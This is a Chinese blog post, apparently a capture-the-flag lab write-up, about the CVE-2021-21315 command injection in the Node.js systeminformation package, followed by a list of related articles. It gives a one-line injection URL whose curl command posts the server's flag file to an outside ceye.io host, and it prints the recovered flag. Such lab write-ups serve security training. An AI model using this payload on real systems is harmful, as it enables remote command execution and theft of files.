春秋云镜 CVE-2021-21315

最新推荐文章于 2024-08-19 15:53:30 发布

isbug0

最新推荐文章于 2024-08-19 15:53:30 发布

阅读量565

点赞数

分类专栏：靶场文章标签：安全 web安全

本文链接：https://blog.youkuaiyun.com/qq_22002773/article/details/132209766

版权

靶场专栏收录该内容

84 篇文章

订阅专栏

春秋云镜 CVE-2021-21315 systeminformation存在命令注入

靶标介绍

systeminformation是一个简单的查询系统和OS信息包。

启动场景

在这里插入图片描述

漏洞利用

exp

/api/osinfo?param[]=$(curl%20-d%20@/flag%20xxx.ceye.io)

登录ceye.io平台，curl请求
http://eci-2zed871sr7xrdjb7q96l.cloudeci1.ichunqiu.com:8080/api/osinfo?param[]=$(curl%20-d%20@/flag%20xxxx.ceye.io)
在这里插入图片描述
查看HTTP请求, record刷新一下

得到flag

flag{94ffcf51-fdea-43e6-b60f-71dcf8cc04cb}

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

isbug0

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

CVE-2021-21315 Linux sudoNode.js命令注入

weixin_47179815的博客

07-15

1685

Node.js是一个基于ChromeV8引擎的JavaScript运行环境，用于方便的搭建响应速度快、易于拓展的网络应用，它包含多种轻量级功能，可以检索详细的硬件和系统相关信息。Node使用Module模块划分不同的功能，每一个模块都包含非常丰富的函数，如http就包含了和http相关的很多函数，帮助开发者对http、tcp/udp等进行操作或创建相关服务器。...

Node.js命令注入漏洞(CVE-2021-21315)复现

玄道的网安博客

04-09

3230

简介 Node.js-systeminformation是用于获取各种系统信息的Node.JS模块，它包含多种轻量级功能，可以检索详细的硬件和系统相关信息。影响版本 Systeminformation < 5.3.1 环境搭建这里用node10.16.0进行测试源码下载 git clone https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC.git nodejs开启http...

参与评论您还未登录，请先登录后发表或查看评论

CVE-2020-16898: Windows操作系统 TCP-IP远程执行代码漏洞

weixin_38896449的博客

12-03

806

这里写目录标题1.漏洞描述2.影响版本3.漏洞排查4.漏洞利用5.漏洞修复 1.漏洞描述 10月，微软官方发布安全公告，修复了Windows操作系统内的TCP/IP远程代码执行漏洞（CVE-2020-16898）。攻击者可通过发送特制的ICMPv6 Router Advertisement（路由通告）数据包至远程Windows主机，即可在目标主机上执行任意代码。漏洞风险：严重 2.影响版本 Windows 10 version 1709/1803/1809/1903/1909/2004 Windows S

Node.Js命令执行(CVE-2021-21315)

m0_65150886的博客

02-20

611

Node使用Module模块划分不同的功能，每一个模块都包含非常丰富的函数，如http就包含了和http相关的很多函数，帮助开发者对http、tcp/udp等进行操作或创建相关服务器。Node.js-systeminformation是用于获取各种系统信息的Node.js模块,在Systeminformation < 5.3.1的版本中，存在命令执行漏洞，攻击者可以通过未过滤的参数中注入payload执行系统命令。6.尝试发送这样的请求：http://ip:port/api/getServices?

node.js 命令执行（CVE-2021-21315）

小小猪的博客

12-30

2397

node.js 命令执行（CVE-2021-21315）漏洞简介： Node.js库中的systeminformation软件包中存在一个命令注入漏洞（CVE-2021-21315）攻击者可以通过「systeminformation」中代码注入漏洞的存在意味着攻击者可以通过在组件使用的未初始化参数内小心翼翼地注入有效载荷来执行系统命令。影响版本： Systeminformation < 5.3.1 环境搭建：在线环境地址漏洞复现：访问首页 DNSlog申请网址..

node.js 命令执行（CVE-2021-21315）复现[VULFOCUS]

m0_37638874的博客

09-06

2369

Node.js-systeminformation是用于获取各种系统信息的Node.JS模块，它包含多种轻量级功能，可以检索详细的硬件和系统相关信息 npm团队发布安全公告，Node.js库中的systeminformation软件包中存在一个命令注入漏洞（CVE-2021-21315），其CVSSv3评分为7.8。攻击者可以通过在未经过滤的参数中注入Payload来执行系统命令。里注册申请一个账号，得到一个申请的网址。

春秋云境 CVE-2022-4230 夺旗

05-02

### 春秋云境 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件（版本13.2.9及以前）中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...

CVE-2021-21315漏洞复现-kali2020.4

weixin_43867542的博客

07-19

1523

漏洞名称：systeminformation 操作系统命令注入漏洞等级危害：高危 CVSS评分：7.8 漏洞类型：操作系统命令注入漏洞概述 systeminformation中存在操作系统命令注入漏洞，该漏洞源于外部输入数据构造操作系统可执行命令过程中，网络系统或产品未正确过滤其中的特殊字符、命令等。攻击者可利用该漏洞执行非法操作系统命令。受影响版本 systeminformation < 5.3.1 环境概述 kali2020.4 漏洞复现 1.准备工作 ...

春秋云镜CVE-2022-30887 Pharmacy Management System shell upload漏洞复现

Ambition_sec的博客

11-17

1737

春秋云镜CVE-2022-30887 Pharmacy Management System shell upload漏洞复现

春秋云镜CVE-2024-0195【记录】

zhiquovo的博客

03-07

1358

春秋云镜CVE-2024-0195【记录】漏洞描述 SpiderFlow爬虫平台项目中spider-flow-web\src\main\java\org\spiderflow\controller\FunctionController.java文件的FunctionService.saveFunction函数调用了saveFunction函数，该调用了自定义函数validScript，该函数中用户能够控制 functionName、parameters 或 script 中的内容，从而构造恶意输入来执行

CVE-2021-21315-PoC：CVE 2021-21315 PoC

03-03

CVE-2021-21315系统信息这是的概念证明，它影响到的系统信息库（npm程序包“ systeminformation”）。 “请务必检查或清理传递给si.inetLatency（），si.inetChecksite（），si.services（），si.processLoad（）的服务参数...仅允许使用字符串，拒绝任何数组。字符串清理如预期般运作。” 因为没有很好地解释漏洞（我认为），所以我决定根据系统信息的漏洞版本编写小型应用程序。 PoC包含：使用明确的易受攻击的系统信息测试Node.js中制作的应用简单测试有效负载即可在受影响的计算机上创建.txt文件重现步骤：在Linux服务器环境上运行应用程序向site.com/api/getServices?name=nginx发出GET请求（nginx只是示例）现在尝试发送这样的请求：yoursite.co

CVE-2021-21315v2

05-07

CVE-2021-21315系统信息这是的概念证明，它影响到的系统信息库（npm程序包“ systeminformation”）。 “请务必检查或清理传递给si.inetLatency（），si.inetChecksite（），si.services（），si.processLoad（）的服务参数...仅允许使用字符串，拒绝任何数组。字符串清理如预期般运作。” 因为它并没有很好地解释漏洞（我认为），所以我决定根据系统信息的易受攻击的版本来编写小型应用程序。 PoC包含：使用明确的易受攻击的系统信息测试Node.js中制作的应用简单测试有效负载即可在受影响的计算机上创建.txt文件重现步骤：在Linux服务器环境上运行应用程序向site.com/api/getServices?name=nginx发出GET请求（nginx只是示例）现在尝试发送这样的请求：yours

【春秋云镜】CVE-2022-22733 Apache ShardingSphere ElasticJob UI 敏感信息泄漏漏洞解题思路

Dark-Specter的博客

03-25

2692

网络安全中的信息泄露通常是指敏感数据无意或有意地被透露给未经授权的人员或系统。这种泄露可以通过多种方式发生，主要涉及技术漏洞、操作失误、内部威胁或安全策略的不足。

CVE-2021-21315 NodeJs命令注入漏洞复现

wurisansheng的博客

10-11

1442

一、简介： Node.js是一个基于Chrome V8引擎的JavaScript运行环境，用于方便的搭建响应速度快、易于拓展的网络应用。Node使用Module模块划分不同的功能，每一个模块都包含非常丰富的函数，如http包含了和http相关的很多函数，帮助开发者对http、tcp、udp等进行操作或创建相关服务器。二、漏洞描述： Node.js-systeminformation是用于获取各种信息的Node.js模块，在存在命令注入漏洞的版本中，攻击者可以通过未过滤的参数注入payload执行系统

CVE-2021-21315漏洞复现

weixin_57379923的博客

08-19

794

靶机：CentOS7 IP:192.168.100.40。攻击机：kali IP:192.168.100.60。下载node.js环境。

Node.Js命令执行漏洞（CVE-2021-21315）复现及排查

dayouzi的博客

08-15

3119

Node.js是一个基于Chrome V8引擎的JavaScript运行环境，用于方便的搭建响应速度快、易于拓展的网络应用。Node使用Module模块划分不同的功能，每一个模块都包含非常丰富的函数，如http就包含了和http相关的很多函数，帮助开发者对http、tcp/udp等进行操作或创建相关服务器。Node.js-systeminformation是用于获取各种系统信息的Node.js模块,在存在命令注入漏洞的版本中，攻击者可以通过未过滤的参数中注入payload执行系统命令。

探索Node.js安全边界：CVE-2021-21315-systeminformation深度剖析与应用

gitblog_00043的博客

06-11

565

探索Node.js安全边界：CVE-2021-21315-systeminformation深度剖析与应用去发现同类优质开源项目:https://gitcode.com/ 在日益复杂的网络环境中，系统安全成为每个开发者和运维人员关注的焦点。今天，我们将深入探讨一个针对Node.js生态系统中的特定漏洞——CVE-2021-21315，这一漏洞影响到了广受欢迎的“systeminformation...

基于JavaScript的框架漏洞_javascript框架库漏洞

m0_60607245的博客

04-09

1186

picture cut是一个jquery插件，以非常友好和简单的方式处理图像，具有基于bootstrap或jquery ui的漂亮界面，具有ajax上传，从资源管理器拖动图像，图像裁剪等强大的功能。中调用**…/core/PictureCut.php** 处理文件上传的代码不检查文件类型并允许用户选择文件位置路径。未经身份验证的用户并将可执行的 PHP 文件上传到服务器，从而允许执行代码。

春秋云镜CVE-2018-18086